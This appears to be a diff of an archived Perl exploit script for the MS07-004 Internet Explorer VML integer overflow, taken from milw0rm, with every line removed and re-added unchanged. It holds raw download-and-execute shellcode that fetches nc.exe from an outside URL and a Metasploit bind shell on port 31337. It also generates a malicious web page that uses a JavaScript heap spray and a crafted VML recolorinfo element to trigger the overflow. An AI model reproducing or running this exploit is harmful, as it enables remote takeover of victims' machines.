+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v/recolorinfo>
+<v/recolorinfo>
-</html>
+</html>
-
+
-# milw0rm.com [2007-01-16]
+# milw0rm.com [2007-01-16]
--- a/platforms/windows/remote/3148.pl
+++ b/platforms/windows/remote/3148.pl
@ -1,255 +1,255 @@
-#(c) pang0 // www.tcbilisim.org
+#(c) pang0 // www.tcbilisim.org
-#bug found3d by LifeAsaGeek
+#bug found3d by LifeAsaGeek
-#thx => o.g. / chaos / sakkure / stansar / xoron
+#thx => o.g. / chaos / sakkure / stansar / xoron
-#MS07-004 VML integer overflow exploit
+#MS07-004 VML integer overflow exploit
-$html = "laz.html";
+$html = "laz.html";
-print "(c) pang0 // www.tcbilisim.org\nbug found3d by LifeAsaGeek\nMS07-004 VML integer overflow exploit\nusage: perl $0 <shell> <opt>\n",
+print "(c) pang0 // www.tcbilisim.org\nbug found3d by LifeAsaGeek\nMS07-004 VML integer overflow exploit\nusage: perl $0 <shell> <opt>\n",
-"shell => -b bind(31337)\n-d down.exec if selc. -d u must a down addr. \n",
+"shell => -b bind(31337)\n-d down.exec if selc. -d u must a down addr. \n",
-"exam: perl $0 -b\nexam2: perl $0 -d http://blah.com/nc.exe\n" and exit if !$ARGV[0];
+"exam: perl $0 -b\nexam2: perl $0 -d http://blah.com/nc.exe\n" and exit if !$ARGV[0];
-#down exec
+#down exec
-$down =
+$down =
-"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03".
+"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03".
-"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74".
+"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74".
-"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E".
+"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E".
-"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03".
+"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03".
-"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C".
+"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C".
-"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40".
+"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40".
-"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C".
+"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C".
-"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC".
+"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC".
-"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F".
+"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F".
-"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB".
+"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB".
-"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83".
+"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83".
-"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF".
+"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF".
-"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF".
+"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF".
-"$url";
+"$url";
-#metasploit 31337 bind shell
+#metasploit 31337 bind shell
-$bind =
+$bind =
-"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x09".
+"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x09".
-"\x7c\xda\x38\x83\xeb\xfc\xe2\xf4\xf5\x16\x31\x75\xe1\x85\x25\xc7".
+"\x7c\xda\x38\x83\xeb\xfc\xe2\xf4\xf5\x16\x31\x75\xe1\x85\x25\xc7".
-"\xf6\x1c\x51\x54\x2d\x58\x51\x7d\x35\xf7\xa6\x3d\x71\x7d\x35\xb3".
+"\xf6\x1c\x51\x54\x2d\x58\x51\x7d\x35\xf7\xa6\x3d\x71\x7d\x35\xb3".
-"\x46\x64\x51\x67\x29\x7d\x31\x71\x82\x48\x51\x39\xe7\x4d\x1a\xa1".
+"\x46\x64\x51\x67\x29\x7d\x31\x71\x82\x48\x51\x39\xe7\x4d\x1a\xa1".
-"\xa5\xf8\x1a\x4c\x0e\xbd\x10\x35\x08\xbe\x31\xcc\x32\x28\xfe\x10".
+"\xa5\xf8\x1a\x4c\x0e\xbd\x10\x35\x08\xbe\x31\xcc\x32\x28\xfe\x10".
-"\x7c\x99\x51\x67\x2d\x7d\x31\x5e\x82\x70\x91\xb3\x56\x60\xdb\xd3".
+"\x7c\x99\x51\x67\x2d\x7d\x31\x5e\x82\x70\x91\xb3\x56\x60\xdb\xd3".
-"\x0a\x50\x51\xb1\x65\x58\xc6\x59\xca\x4d\x01\x5c\x82\x3f\xea\xb3".
+"\x0a\x50\x51\xb1\x65\x58\xc6\x59\xca\x4d\x01\x5c\x82\x3f\xea\xb3".
-"\x49\x70\x51\x48\x15\xd1\x51\x78\x01\x22\xb2\xb6\x47\x72\x36\x68".
+"\x49\x70\x51\x48\x15\xd1\x51\x78\x01\x22\xb2\xb6\x47\x72\x36\x68".
-"\xf6\xaa\xbc\x6b\x6f\x14\xe9\x0a\x61\x0b\xa9\x0a\x56\x28\x25\xe8".
+"\xf6\xaa\xbc\x6b\x6f\x14\xe9\x0a\x61\x0b\xa9\x0a\x56\x28\x25\xe8".
-"\x61\xb7\x37\xc4\x32\x2c\x25\xee\x56\xf5\x3f\x5e\x88\x91\xd2\x3a".
+"\x61\xb7\x37\xc4\x32\x2c\x25\xee\x56\xf5\x3f\x5e\x88\x91\xd2\x3a".
-"\x5c\x16\xd8\xc7\xd9\x14\x03\x31\xfc\xd1\x8d\xc7\xdf\x2f\x89\x6b".
+"\x5c\x16\xd8\xc7\xd9\x14\x03\x31\xfc\xd1\x8d\xc7\xdf\x2f\x89\x6b".
-"\x5a\x2f\x99\x6b\x4a\x2f\x25\xe8\x6f\x14\xa0\x51\x6f\x2f\x53\xd9".
+"\x5a\x2f\x99\x6b\x4a\x2f\x25\xe8\x6f\x14\xa0\x51\x6f\x2f\x53\xd9".
-"\x9c\x14\x7e\x22\x79\xbb\x8d\xc7\xdf\x16\xca\x69\x5c\x83\x0a\x50".
+"\x9c\x14\x7e\x22\x79\xbb\x8d\xc7\xdf\x16\xca\x69\x5c\x83\x0a\x50".
-"\xad\xd1\xf4\xd1\x5e\x83\x0c\x6b\x5c\x83\x0a\x50\xec\x35\x5c\x71".
+"\xad\xd1\xf4\xd1\x5e\x83\x0c\x6b\x5c\x83\x0a\x50\xec\x35\x5c\x71".
-"\x5e\x83\x0c\x68\x5d\x28\x8f\xc7\xd9\xef\xb2\xdf\x70\xba\xa3\x6f".
+"\x5e\x83\x0c\x68\x5d\x28\x8f\xc7\xd9\xef\xb2\xdf\x70\xba\xa3\x6f".
-"\xf6\xaa\x8f\xc7\xd9\x1a\xb0\x5c\x6f\x14\xb9\x55\x80\x99\xb0\x68".
+"\xf6\xaa\x8f\xc7\xd9\x1a\xb0\x5c\x6f\x14\xb9\x55\x80\x99\xb0\x68".
-"\x50\x55\x16\xb1\xee\x16\x9e\xb1\xeb\x4d\x1a\xcb\xa3\x82\x98\x15".
+"\x50\x55\x16\xb1\xee\x16\x9e\xb1\xeb\x4d\x1a\xcb\xa3\x82\x98\x15".
-"\xf7\x3e\xf6\xab\x84\x06\xe2\x93\xa2\xd7\xb2\x4a\xf7\xcf\xcc\xc7".
+"\xf7\x3e\xf6\xab\x84\x06\xe2\x93\xa2\xd7\xb2\x4a\xf7\xcf\xcc\xc7".
-"\x7c\x38\x25\xee\x52\x2b\x88\x69\x58\x2d\xb0\x39\x58\x2d\x8f\x69".
+"\x7c\x38\x25\xee\x52\x2b\x88\x69\x58\x2d\xb0\x39\x58\x2d\x8f\x69".
-"\xf6\xac\xb2\x95\xd0\x79\x14\x6b\xf6\xaa\xb0\xc7\xf6\x4b\x25\xe8".
+"\xf6\xac\xb2\x95\xd0\x79\x14\x6b\xf6\xaa\xb0\xc7\xf6\x4b\x25\xe8".
-"\x82\x2b\x26\xbb\xcd\x18\x25\xee\x5b\x83\x0a\x50\xf9\xf6\xde\x67".
+"\x82\x2b\x26\xbb\xcd\x18\x25\xee\x5b\x83\x0a\x50\xf9\xf6\xde\x67".
-"\x5a\x83\x0c\xc7\xd9\x7c\xda\x38";
+"\x5a\x83\x0c\xc7\xd9\x7c\xda\x38";
-if ($ARGV[0] eq '-d'){
+if ($ARGV[0] eq '-d'){
-$shlaz = $down;$url = $ARGV[1];$url = "http://pang0.by.ru/wget/nc.exe";
+$shlaz = $down;$url = $ARGV[1];$url = "http://pang0.by.ru/wget/nc.exe";
-print "u must start http:// or ftp://\n" and exit if !($url =~ /http|ftp/);
+print "u must start http:// or ftp://\n" and exit if !($url =~ /http|ftp/);
-}
+}
-$shlaz = $bind if $ARGV[0] eq '-b';
+$shlaz = $bind if $ARGV[0] eq '-b';
-#citation to metasploit
+#citation to metasploit
-sub dongu {
+sub dongu {
-        my $data = shift;
+        my $data = shift;
-        my $mode = shift() || 'LE';
+        my $mode = shift() || 'LE';
-        my $code = '';
+        my $code = '';
-
+
-        my $idx = 0;
+        my $idx = 0;
-
+
-        if (length($data) % 2 != 0) {
+        if (length($data) % 2 != 0) {
-                $data .= substr($data, -1, 1);
+                $data .= substr($data, -1, 1);
-        }
+        }
-
+
-        while ($idx < length($data) - 1) {
+        while ($idx < length($data) - 1) {
-                my $c1 = ord(substr($data, $idx, 1));
+                my $c1 = ord(substr($data, $idx, 1));
-                my $c2 = ord(substr($data, $idx+1, 1));
+                my $c2 = ord(substr($data, $idx+1, 1));
-                if ($mode eq 'LE') {
+                if ($mode eq 'LE') {
-                        $code .= sprintf('%%u%.2x%.2x', $c2, $c1);
+                        $code .= sprintf('%%u%.2x%.2x', $c2, $c1);
-                } else {
+                } else {
-                        $code .= sprintf('%%u%.2x%.2x', $c1, $c2);
+                        $code .= sprintf('%%u%.2x%.2x', $c1, $c2);
-                }
+                }
-                $idx += 2;
+                $idx += 2;
-        }
+        }
-
+
-        return $code;
+        return $code;
-}
+}
-$sh3llz = dongu($shlaz);
+$sh3llz = dongu($shlaz);
-#_
+#_
-$body = <<BODY;
+$body = <<BODY;
-<html xmlns:v="urn:schemas-microsoft-com:vml">
+<html xmlns:v="urn:schemas-microsoft-com:vml">
-
+
-<head>
+<head>
-<object id="VMLRender"
+<object id="VMLRender"
-classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
+classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
-</object>
+</object>
-<style>
+<style>
-v\\:* { behavior: url(#VMLRender); }
+v\\:* { behavior: url(#VMLRender); }
-</style>
+</style>
-</head>
+</head>
-
+
-<body>
+<body>
-
+
-<SCRIPT language="javascript">
+<SCRIPT language="javascript">
-shellcode =
+shellcode =
-unescape("%u9090%u9090$sh3llz");
+unescape("%u9090%u9090$sh3llz");
-
+
-bigblock = unescape("%u0505%u0505");
+bigblock = unescape("%u0505%u0505");
-headersize = 20;
+headersize = 20;
-slackspace = headersize+shellcode.length;
+slackspace = headersize+shellcode.length;
-while (bigblock.length<slackspace) bigblock+=bigblock;
+while (bigblock.length<slackspace) bigblock+=bigblock;
-fillblock = bigblock.substring(0, slackspace);
+fillblock = bigblock.substring(0, slackspace);
-block = bigblock.substring(0, bigblock.length-slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
-while(block.length+slackspace<0x40000) block = block+block+fillblock;
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
-memory = new Array();
+memory = new Array();
-for (i=0;i<350;i++) memory[i] = block + shellcode;
+for (i=0;i<350;i++) memory[i] = block + shellcode;
-
+
-</script>
+</script>
-
+
-<v:rect style='width:120pt;height:80pt' fillcolor="red" >
+<v:rect style='width:120pt;height:80pt' fillcolor="red" >
-<v:recolorinfo recolorstate="t" numcolors="97612895">
+<v:recolorinfo recolorstate="t" numcolors="97612895">
-
+
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
